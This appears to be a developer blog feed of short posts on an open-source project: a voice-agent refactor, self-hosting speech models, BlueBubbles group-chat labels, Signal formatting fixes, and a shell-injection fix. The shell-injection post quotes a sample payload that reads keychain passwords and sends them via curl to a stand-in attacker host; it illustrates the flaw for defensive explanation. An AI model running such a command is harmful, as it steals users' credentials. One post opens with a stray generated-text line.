I've been knee-deep in refactoring a **voice-agent** codebase—one of those projects that looks clean on the surface but hides architectural chaos underneath. The mission: consolidate 3,400+ lines of scattered handler code, untangle circular dependencies, and introduce proper dependency injection. The story begins innocently. The `handlers.py` file had ballooned to 3,407 lines, with handlers reaching into a dozen global variables from legacy modules. Every handler touched `_pending_restart`, `_user_sessions`, `_context_cache`—you name it. The coupling was so tight that extracting even a single handler meant dragging half the codebase with it. I started with the low-hanging fruit: moving `UserSession` and `UserSessionManager` into `src/core/session.py`, creating a real orchestrator layer that didn't import from Telegram handlers, and fixing subprocess calls. The critical bug? A blocking `subprocess.run()` in the compaction logic was freezing the entire async event loop. Switching to `asyncio.create_subprocess_exec()` with a 60-second timeout was a no-brainer, but it revealed another issue: **I had to ensure all imports were top-level**, not inline, to avoid race conditions. Then came the DI refactor—the real challenge. I designed a `HandlerDeps` dataclass to pass dependencies explicitly, added a `DepsMiddleware` to inject them, and started migrating handlers off globals. But here's where reality hit: the voice and document handlers were so intertwined with legacy globals (especially `_execute_restart`) that extracting them would create *more* coupling, not less. Sometimes the best refactor is knowing when *not* to refactor. The breakthrough came when I recognized the pattern: **not all handlers need DI**. The Telegram bot handlers, the CLI routing layer—those could be decoupled. The legacy handlers? I'd leave them as-is for now, but isolate them behind clear boundaries. By step 5, I had 566 passing tests and zero failing ones. The memory leak in `RateLimitMiddleware` was devilishly simple—stale user entries weren't being cleaned up. A periodic cleanup loop fixed it. The undefined `candidates` variable in error handling? That's what happens when code generation outpaces testing. Add a test, catch the bug. **The lesson learned**: refactoring legacy code isn't about achieving perfect architecture in one go. It's about strategic decoupling—fixing the leaks that matter, removing the globals that matter, and deferring the rest. Sometimes the best code is the code you don't rewrite. As a programmer, I learned long ago: *we don't worry about warnings—only errors* 😄

Feb 15, 2026
New Featureborisovai-admin

Loading 9 AI Models to a Private HTTPS Server

I just finished a satisfying infrastructure task: deploying **9 machine learning models** to a self-hosted file server and making them accessible via HTTPS with proper range request support. Here's how it went. ## The Challenge The **borisovai-admin** project needed a reliable way to serve large AI models—from Whisper variants to Russian ASR solutions—without relying on external APIs or paying bandwidth fees to HuggingFace every time someone needed a model. We're talking about 19 gigabytes of neural networks that need to be fast, resilient, and actually *usable* from client applications. I started by setting up a lightweight file server, then systematically pulled models from HuggingFace using `huggingface_hub`. The trick was managing the downloads smartly: some models are 5+ GB, so I parallelized where possible while respecting rate limits. ## What Got Deployed The lineup includes serious tooling: - **Faster-Whisper models** (base through large-v3-turbo)—for speech-to-text across accuracy/speed tradeoffs - **ruT5-ASR-large**—a Russian-optimized speech recognition model, surprisingly hefty at 5.5 GB - **GigAAM variants** (v2 and v3 in ONNX format)—lighter, faster inference for production - **Vosk small Russian model**—the bantamweight option when you need something lean Each model is now available at its own HTTPS endpoint: `https://files.dev.borisovai.ru/public/models/{model_name}/`. ## The Details That Matter Getting this right meant more than just copying files. I verified **CORS headers** work correctly—so browsers can fetch models directly. I tested **HTTP Range requests**—critical for resumable downloads and partial loads. The server reports content types properly, handles streaming, and doesn't choke when clients request specific byte ranges. Storage-wise, we're using 32% of available disk (130 GB free), which gives comfortable headroom for future additions. The models cover the spectrum: from tiny Vosk (88 MB) for embedded use cases to the heavyweight ruT5 (5.5 GB) when you need Russian language sophistication. ## Why This Matters Having models hosted internally means **zero API costs**, **predictable latency**, and **full control** over model versions. Teams can now experiment with different Whisper sizes without vendor lock-in. The Russian ASR models become practical for real production workloads instead of expensive API calls. This is infrastructure work—not glamorous, but it's the kind of unsexy plumbing that makes everything else possible. --- *Eight bytes walk into a bar. The bartender asks, "Can I get you anything?" "Yeah," reply the bytes. "Make us a double." 😄*

Feb 15, 2026
Bug Fixopenclaw

Group Messages Finally Get Names

I'll now provide the corrected text with all errors fixed: # Fixing BlueBubbles: Making Group Chats Speak for Themselves The task seemed straightforward on the surface: BlueBubbles group messages weren't displaying sender information properly in the chat envelope. Users would see messages from group chats arrive, but the context was fuzzy—you couldn't immediately tell who sent what. For a messaging platform, that's a significant friction point. The fix required aligning BlueBubbles with how other channels (iMessage, Signal) already handle this scenario. The developer's first move was to implement `formatInboundEnvelope`, a pattern already proven in the codebase for other messaging systems. Instead of letting group messages land without proper context, the envelope would now display the group label in the header and embed the sender's name directly in the message body. Suddenly, the `ConversationLabel` field—which had been undefined for groups—resolved to the actual group name. But there was more work ahead. Raw message formatting wasn't enough. The developer wrapped the context payload with `finalizeInboundContext`, ensuring field normalization, ChatType determination, ConversationLabel fallbacks, and MediaType alignment all happened consistently. This is where discipline matters: rather than reinventing validation logic, matching the pattern used across every other channel eliminated edge cases and kept the codebase predictable. One subtle detail emerged during code review: the `BodyForAgent` field. The developer initially passed the envelope-formatted body to the agent prompt, but that meant the LLM was reading something like `[BlueBubbles sender-name: actual message text]` instead of clean, raw text. Switching to the raw body meant the agent could focus on understanding the actual message content without parsing wrapper formatting. Then came the `fromLabel` alignment. Groups and direct messages needed consistent identifier patterns: groups would show as `GroupName id:peerId`, while DMs would display `Name id:senderId` only when the name differed from the ID. This granular consistency—matching the shared `formatInboundFromLabel` pattern—ensures that downstream systems and UI layers can rely on predictable labeling. **Here's something interesting about messaging protocol design**: when iMessage and Signal independently arrived at similar envelope patterns, it wasn't coincidence. These patterns emerged from practical necessity. Showing sender identity, conversation context, and message metadata in a consistent structure prevents a cascade of bugs downstream. Every system that touches message data (UI renderers, AI agents, search indexers) benefits from knowing exactly where that information lives. By the end, BlueBubbles group chats worked like every other supported channel in the system. The fix touched three focused commits: introducing proper envelope formatting, normalizing the context pipeline, and refining label patterns. It's the kind of work that doesn't feel dramatic—no algorithms, no novel architecture—but it's exactly what separates systems that *almost* work from those that work *reliably*. The lesson? Sometimes the most impactful fixes are about consistency, not complexity. When you make one path match another, you're not just solving a bug—you're preventing a dozen future ones.

Feb 14, 2026
Bug Fixopenclaw

Shell Injection Prevention: Bypassing the Shell to Stay Safe

# Outsmarting Shell Injection: How One Line of Code Stopped a Security Nightmare The openclaw project had a vulnerability hiding in plain sight. In the macOS keychain credential handler, OAuth tokens from external providers were being passed directly into a shell command via string interpolation. Severity: HIGH. The kind of finding that makes security auditors lose sleep. The vulnerable code looked innocuous at first—just building a `security` command string with careful single-quote escaping. But here's the problem: **escaping quotes doesn't protect against shell metacharacters like `$()` and backticks.** An attacker-controlled OAuth token could slip in command substitution payloads that would execute before the shell even evaluated the quotes. Imagine a malicious token like `` `$(curl attacker.com/exfil?data=$(security find-generic-password))` `` — it wouldn't matter how many quotes you added, the backticks would still trigger execution. The fix was elegantly simple but required understanding a fundamental distinction in how processes spawn. Instead of using `execSync` to fire off a shell-interpreted string, the developer switched to **`execFileSync`**, which bypasses the shell entirely. The command now passes arguments as an array: `["add-generic-password", "-U", "-s", SERVICE, "-a", ACCOUNT, "-w", newValue]`. The operating system handles argument boundaries natively—no interpretation layer, no escaping theater. This is a textbook example of why **you should never shell-interpolate user input**, even with escaping. Escaping is context-dependent and easy to get wrong. The gold standard is to avoid the shell altogether. When spawning processes in Node.js, `execFileSync` is the security default; `execSync` should only be used when you genuinely need shell features like pipes or globbing. The patch was merged to the main branch on February 14th, addressing not just CWE-78 (OS Command Injection) but closing an actual attack surface that could have compromised gateway user credentials. No complex mitigations, no clever regex tricks—just the right API call for the job. The lesson stuck: **trust the OS to handle arguments, not your escaping logic.** One line of code, infinitely more secure. Eight bytes walk into a bar. The bartender asks, "Can I get you anything?" "Yeah," reply the bytes. "Make us a double."

Feb 14, 2026
Bug Fixopenclaw

Fixing Markdown IR and Signal Formatting: A Journey Through Text Rendering

When you're working with a chat platform that supports rich formatting, you'd think rendering bold text and handling links would be straightforward. But OpenClaw's Signal formatting had accumulated a surprising number of edge cases—and my recent PR #9781 was the payoff of tracking down each one. The problem started innocent enough: markdown-to-IR (intermediate representation) conversion was producing extra newlines between list items and following paragraphs. Nested lists had indentation issues. Blockquotes weren't visually distinct. Then there were the Signal formatting quirks—URLs weren't being deduplicated properly because the comparison logic didn't normalize protocol prefixes or trailing slashes. Headings rendered as plain text instead of bold. When you expanded a markdown link inline, the style offsets for bold and italic text would drift to completely wrong positions. The real kicker? If you had **multiple links** expanding in a single message, `applyInsertionsToStyles()` was using original coordinates for each insertion without tracking cumulative shift. Imagine bolding a phrase that spans across expanded URLs—the bold range would end up highlighting random chunks of text several lines down. Not ideal for a communication platform. I rebuilt the markdown IR layer systematically. Blockquote closing tags no longer emit redundant newlines—the inner content handles spacing. Horizontal rules now render as visible `───` separators instead of silently disappearing. Tables in code mode strip their inner cell styles so they don't overlap with code block formatting. The bigger refactor was replacing the fragile `indexOf`-based chunk position tracking with deterministic cursor tracking in `splitSignalFormattedText`. Now it splits at whitespace boundaries, respects chunk size limits, and slices style ranges with correct local offsets. But here's what really validated the work: 69 new tests. Fifty-one tests for markdown IR covering spacing, nested lists, blockquotes, tables, and horizontal rules. Eighteen tests for Signal formatting. And nineteen tests specifically for style preservation across chunk boundaries when links expand. Every edge case got regression coverage. The cumulative shift tracking fix alone—ensuring bold and italic styles stay in the right place after multiple link expansions—felt like watching a long-standing bug finally surrender. You spend weeks chasing phantom style offsets across coordinate systems, and then one small addition (`cumulative_shift += insertion.length_delta`) makes it click. OpenClaw's formatting pipeline is now more predictable, more testable, and actually preserves your styling intentions. No more mysterious bold text appearing three paragraphs later. 😄

Feb 14, 2026